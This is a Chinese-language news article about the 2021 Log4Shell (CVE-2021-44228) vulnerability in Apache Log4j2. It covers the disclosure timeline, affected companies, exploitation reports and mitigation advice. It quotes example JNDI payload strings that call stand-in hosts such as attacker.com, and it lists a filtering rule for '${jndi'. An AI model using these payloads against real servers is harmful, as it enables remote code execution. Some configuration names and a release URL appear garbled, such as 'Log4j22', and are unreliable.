2021年11月24日，阿里云安全團(tuán)隊依然像往常一樣進(jìn)行著漏洞的篩查工作。

讓人沒想到的是，團(tuán)隊成員之一的Chen Zhaojun一鏟子下去，就挖出了一個「過去十年來影響最大、最嚴(yán)重的漏洞」——Log4Shell。

借著這個漏洞，攻擊者只需要提交一個字符串就能訪問對方的服務(wù)器，甚至還能在里面上傳運行任何代碼！

結(jié)果就是，12月10號，本來已經(jīng)在準(zhǔn)備過周末的大廠程序員們，都起來通宵加班處理漏洞了。

這個漏洞波及了多少大廠呢？

由于Log4j2這個庫實在是太受歡迎了，所以包括蘋果、Tesla、亞馬遜、Cloudflare、ElasticSearch、Red Hat、Twitter、Steam、百度、網(wǎng)易、騰訊等大廠都會受到影響。

可能，還有數(shù)百家甚至數(shù)千家其他組織也會受到影響。

一些信息安全研究人員預(yù)計，未來幾天互聯(lián)網(wǎng)上對服務(wù)器的攻擊會大幅增加。

驚魂一刻

11月24日，開源項目Apache Log4j2的一個遠(yuǎn)程代碼執(zhí)行漏洞被提交。

12月7日上午，Apache發(fā)布了2.15.0-rc1版本更新。

12月9日晚，漏洞的利用細(xì)節(jié)被公開，影響范圍幾乎橫跨整個版本（從2.0到2.14.1-rc1）。

當(dāng)大家紛紛升級到2.15.0-rc1之后發(fā)現(xiàn)，該補丁依然可以被繞過。

12月10日凌晨2點半左右，Apache Log4j2緊急更新了2.15.0-rc2版本。

此時，各個大廠也幾乎都在熬夜搶修。

據(jù)火絨不完全統(tǒng)計，僅在Github上，就有60644個開源項目發(fā)布的321094軟件包存在風(fēng)險，這一漏洞可以說是影響了互聯(lián)網(wǎng)上70%以上企業(yè)系統(tǒng)的正常運轉(zhuǎn)。

Java開發(fā)框架中，受到Log4j2的影響Top10（來源：火絨安全）

這一漏洞名為CVE-2021-44228，也叫Log4Shell或LogJam，是一個遠(yuǎn)程代碼執(zhí)行（RCE）類漏洞，存在于一個「數(shù)百萬」應(yīng)用程序都在使用的開源Java日志庫Log4j2中。

由于Java應(yīng)用程序通常會記錄各種各樣的事件，例如用戶發(fā)送和接收的消息，或者系統(tǒng)錯誤的詳細(xì)信息，因此該漏洞可以通過多種方式觸發(fā)。

而這一漏洞最危險的地方是它太容易被攻擊者利用了，即使是毫無經(jīng)驗的普通人也可以利用這個漏洞成功執(zhí)行攻擊。

攻擊者只需發(fā)送一則特殊的消息到服務(wù)器（包含類似${jndi:ldap://server.com/a}的字符串），就可以執(zhí)行任意的代碼，并有可能完全控制該系統(tǒng)。

據(jù)阿里的@程序員子悠介紹，服務(wù)器會通過Log4j2記錄攻擊者發(fā)送的請求匯中包含的基于JNDI和LDAP的惡意負(fù)載${
jndi:ldap://http://attacker.com/}，其中，http://attacker.com是攻擊者控制的地址。

當(dāng)服務(wù)器通過JNDI向http://server.com請求，觸發(fā)惡意負(fù)載之后，http://attacker.com就可以在響應(yīng)中添加任何可執(zhí)行腳本，注入到服務(wù)器進(jìn)程中。

于是，上個周末，大大小小公司的安全團(tuán)隊都在爭先恐后地修補Log4Shell漏洞，晚一秒，就有可能讓黑客危及互聯(lián)網(wǎng)上數(shù)百萬臺設(shè)備。

而黑客們也沒閑著，安全服務(wù)商imperva當(dāng)天就監(jiān)控到了140多萬次針對CVE-2021-44228的攻擊。

新西蘭計算機(jī)應(yīng)急響應(yīng)小組(CERT)、德國電信(Deutsche Telekom)和Greynoise的網(wǎng)絡(luò)監(jiān)控服務(wù)都發(fā)出了警告：「攻擊者已經(jīng)在積極利用這個漏洞」。

根據(jù)Greynoise的說法，大約100個不同的主機(jī)正在大規(guī)模地尋找利用Log4j2漏洞的方法。

很快，多家信息安全新聞機(jī)構(gòu)都報道了這個在Apache Log4j2庫中發(fā)現(xiàn)的，CVSS嚴(yán)重程度為10級的關(guān)鍵漏洞CVE-2021-44228。

阿里云安全團(tuán)隊在12月10日發(fā)布公告。

https://help.aliyun.com/noticelist/articleid/1060971232.html

國家互聯(lián)網(wǎng)應(yīng)急中心12月10日發(fā)布公告。

https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html

美國國家計算機(jī)通用漏洞數(shù)據(jù)庫12月10日發(fā)布公告。

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Apache基金會也迅速回應(yīng)，建議所有開發(fā)人員能升級就升級，將手頭上使用到的Log4j2庫更新到2.15.0版本，如果因為一些原因升不了級，就使用Apache Log4j2安全漏洞頁面中描述的方法進(jìn)行撲救。

12月12號，有網(wǎng)友反映銀行的程序都不能用了，推測可能正在加班加點排查，看來波及范圍確實挺大的。

這下程序員們要哭了，紛紛吐槽：

「連夜搶修」

「忙活大半天」

復(fù)現(xiàn)漏洞

國民級搜索引擎百度首先遭到了廣大網(wǎng)友的暴力測試！

漏洞剛曝光時，如果在百度搜索框中輸入命令，然后在dnslog中就可以發(fā)現(xiàn)訪問信息，隨后開發(fā)人員也是緊急修復(fù)了這個漏洞。

接著，網(wǎng)友又攻破了一向以安全性著稱的蘋果。

Minecraft也同樣慘遭毒手。

由于Minecraft在軟件中也采用了Log4j2，而且使用范圍很廣，這就導(dǎo)致了除Mohist 1.18外，Minecraft全版本所有系列的服務(wù)端全部處于高風(fēng)險狀態(tài)。

這樣一來，在聊天欄輸入命令就可以在游戲中作弊。

對于Minecraft服主來說，當(dāng)前最該做的就是立即關(guān)閉服務(wù)器，并進(jìn)行升級和緊急修復(fù)，普通玩家則需要等待，直到服務(wù)器確認(rèn)修復(fù)完成。

解決方案

根據(jù)360的建議，用戶可以進(jìn)行如下操作。

常規(guī)方案

使用了Apache Log4j2的用戶，請將程序更新至官方最新安全版本（2.15.0-rc2）。下載地址:

https://github.com/apache/logging-Log4j22/releases/tag/Log4j2-2.15.0-rc2

臨時應(yīng)急方案

修改Log4j2配置：

Log4j22.formatMsgNoLookups=True

設(shè)置JVM啟動參數(shù)：

-DLog4j22.formatMsgNoLookups=true

設(shè)置環(huán)境變量：

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS值為true

可以提高安全性的周邊設(shè)置

以下設(shè)置或操作可能會對防護(hù)此次安全事件起到作用，但無法確保安全。建議結(jié)合實際應(yīng)用場景進(jìn)行配置：

1. 使用盡可能更高版本的JDK
2. 使用rasp阻斷l(xiāng)ookup的調(diào)用
3. 使用waf對流量中的${jndi進(jìn)行攔截
4. 禁止所有不必要的外連數(shù)據(jù)

開源項目的風(fēng)險

Log4j2的安全事故一出，不禁讓廣大用戶重新開始懷疑：開源軟件是否真的安全？

一方面大家覺得開源軟件嘛，代碼都拿到手了，在遵照開源協(xié)議的情況下，基本就是白嫖。

另一方面，覺得有這么多人都在盯著這份代碼，肯定不會出bug，不然一定會有人提issue修復(fù)的。在不花錢的情況下，又指望它有企業(yè)級的維護(hù)支持與安全性保障。

殊不知，大部分開源軟件都是作者利用業(yè)余時間開發(fā)的，為開源社區(qū)貢獻(xiàn)代碼的驅(qū)動力全部來自于star和「用愛發(fā)電」。

也正是因為免費，一些開源軟件的受眾規(guī)模特別大，從小公司到千億市值的企業(yè)都在使用，如果一旦出了漏洞，那后果將不堪設(shè)想。

所以，開源有風(fēng)險，使用需謹(jǐn)慎！